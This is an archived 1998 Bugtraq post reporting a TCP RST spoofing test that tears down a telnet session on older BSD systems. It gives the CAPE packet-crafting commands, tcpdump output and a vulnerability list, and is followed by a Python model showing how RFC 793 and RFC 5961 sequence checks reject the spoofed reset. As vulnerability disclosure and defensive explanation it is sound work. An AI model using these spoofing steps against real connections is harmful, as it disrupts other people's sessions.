Bugtraq mailing list archives
Re: FreeBSD's RST validation
From: oliver () SECNET COM (Oliver Friedrichs)
Date: Mon, 31 Aug 1998 13:36:35 -0600
Darren Reed brought this up in June, 1997, on the NetBSD security list, after which I performed some tests. I ended up with a number of questions after doing this, but never followed up to determine what was going on. Anyways, here's my old message.

- Oliver
Network Associates, Inc.

------

Ok, here's how my tests turned out:

I have 3 systems involved:

199.185.231.20 - OpenBSD system
199.185.231.24 - FreeBSD system
199.185.231.25 - BSDI system

I'm telneted from BSDI to FreeBSD, and monitoring and spoofing from the OpenBSD system using tcpdump and CAPE.

20:25:01.261260 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: P 2752239993:2752239994(1) ack 4220895731 win 8760 <nop,nop,timestamp 750118 2277749> [tos 0x10]
20:25:01.263337 freebsd.secnet.com.telnet > bsdi.secnet.com.3349: P 1:55(54) ack 1 win 17376 <nop,nop,timestamp 2278005 750118> (DF) [tos 0x10]

So I'm logged into FreeBSD from port 3349 on the BSDI system.

On OpenBSD..

bash# ./cape -i
Welcome to CAPE. "help" for general help, "help topic" for help on topic
Active network interfaces:
- Interface: lo0 Address: 127.0.0.1
- Interface: ed2 Address: 199.185.231.20
cape> iface=ed2
cape> gateway=199.185.231.24
cape> ip
cape> ip_src=199.185.231.23
cape> ip_dst=199.185.231.24
cape> ip_proto=IPPROTO_TCP
cape> tcp
cape> tcp_sport=3349
cape> tcp_dport=23
cape> tcp_flags=RST
cape> send
Processing:
Packet transmitted

Here's my spoofed packet with random seq/ack numbers:

20:28:20.885563 bsdi.secnet.com.3349 > freebsd.secnet.com.telnet: R 1649760492:1649760492(0) win 4096

As soon as I hit a key on the FreeBSD system...

[20:25:01] [freebsd] [/usr/local/scanner] %
Connection closed by foreign host.

Poof, it works, repeatable every time.

This works when spoofing the packet from the BSDI system TO the FreeBSD system. For some reason (which I've been unable to figure out yet), I cannot spoof packets from the FreeBSD system to the BSDI system and have this work. This works between OpenBSD and FreeBSD however (both ways).

This doesn't work against Solaris. Here's what I found with the systems here:

OpenBSD 2.1 - vulnerable
FreeBSD 2.1.x - vulnerable
BSDI - appears not vulnerable (?)
Solaris 2.5 - appears not vulnerable
IRIX 6.2 - appears not vulnerable
Linux - appears not vulnerable
Windows NT - appears not vulnerable
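The difference between the "vulnerable" and "not vulnerable" hosts in the post comes down to what the receiving TCP checks before honouring a RST. The following is an added example (not code from the post, from CAPE, or from any of the BSD kernels discussed) that models a receiver's RST decision under three policies: accepting any RST that matches the connection's 4-tuple, the RFC 793 rule that the RST's sequence number must fall inside the receive window, and the stricter RFC 5961 rule that it must equal RCV.NXT exactly, with an in-window but inexact value answered by a challenge ACK. The connection state (next expected sequence number 2752239994, window 17376) and the spoofed RST's sequence number 1649760492 are taken from the tcpdump lines in the post; the BSDI address 199.185.231.25 comes from the post's host list; the policy names, class names and function signatures are this example's own.

```python
"""Model of how a TCP endpoint decides whether an incoming RST segment
should tear down a connection, under three validation policies.

Added example, not code from the original post or any BSD kernel. The
connection and segment values are taken from the tcpdump output in the
post; policy names and function signatures are this example's own.
"""
from dataclasses import dataclass

SEQ_MOD = 1 << 32  # TCP sequence numbers are 32-bit and wrap around


@dataclass
class Connection:
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    rcv_nxt: int   # next sequence number we expect from the peer
    rcv_wnd: int   # size of the receive window we advertise


@dataclass
class Segment:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    seq: int
    rst: bool = False


def seq_in_window(seq: int, rcv_nxt: int, rcv_wnd: int) -> bool:
    """True if rcv_nxt <= seq < rcv_nxt + rcv_wnd, computed modulo 2**32."""
    return (seq - rcv_nxt) % SEQ_MOD < rcv_wnd


def matches_tuple(conn: Connection, seg: Segment) -> bool:
    """Demultiplexing: does the segment belong to this connection at all?"""
    return (seg.src_ip, seg.src_port, seg.dst_ip, seg.dst_port) == (
        conn.remote_ip, conn.remote_port, conn.local_ip, conn.local_port)


def handle_rst(conn: Connection, seg: Segment, policy: str) -> str:
    """Return 'reset', 'drop' or 'challenge-ack' for an incoming segment.

    policy:
      'tuple-only' - any RST matching the 4-tuple resets the connection
                     (the behaviour the post observed on the vulnerable hosts)
      'rfc793'     - the RST is honoured only if its SEQ is inside the receive window
      'rfc5961'    - the RST is honoured only if SEQ == RCV.NXT; an in-window but
                     inexact SEQ gets a challenge ACK instead (RFC 5961, section 3.2)
    """
    if not seg.rst or not matches_tuple(conn, seg):
        return 'drop'
    if policy == 'tuple-only':
        return 'reset'
    if policy == 'rfc793':
        return 'reset' if seq_in_window(seg.seq, conn.rcv_nxt, conn.rcv_wnd) else 'drop'
    if policy == 'rfc5961':
        if seg.seq == conn.rcv_nxt:
            return 'reset'
        if seq_in_window(seg.seq, conn.rcv_nxt, conn.rcv_wnd):
            return 'challenge-ack'
        return 'drop'
    raise ValueError(f'unknown policy {policy!r}')


# The telnet session from the post as seen from the FreeBSD side. After the
# segment "P 2752239993:2752239994(1)" from BSDI, FreeBSD expects 2752239994
# next and advertises a 17376-byte window (values from the post's tcpdump).
TELNET = Connection(local_ip='199.185.231.24', local_port=23,
                    remote_ip='199.185.231.25', remote_port=3349,
                    rcv_nxt=2752239994, rcv_wnd=17376)

# The spoofed RST from the post: correct 4-tuple, random sequence number.
SPOOFED_RST = Segment(src_ip='199.185.231.25', src_port=3349,
                      dst_ip='199.185.231.24', dst_port=23,
                      seq=1649760492, rst=True)


def outcomes(conn: Connection = TELNET, seg: Segment = SPOOFED_RST) -> dict:
    """Decision for one segment under each policy, keyed by policy name."""
    return {p: handle_rst(conn, seg, p) for p in ('tuple-only', 'rfc793', 'rfc5961')}


if __name__ == '__main__':
    for policy, result in outcomes().items():
        print(f'{policy:11s} -> {result}')
```

Run as a script, the model shows the spoofed segment resetting the connection only under the tuple-only policy: its sequence number is about 3.2 billion past RCV.NXT (modulo 2**32), so both the RFC 793 window check and the RFC 5961 exact-match check discard it. The window check matters for the same reason a receiver cannot blindly trust the source address: with no sequence validation, an off-path sender needs only the four addressing fields, which the post shows are easy to learn from a packet capture, whereas a sequence check forces the value to land in a narrow range chosen by the endpoints.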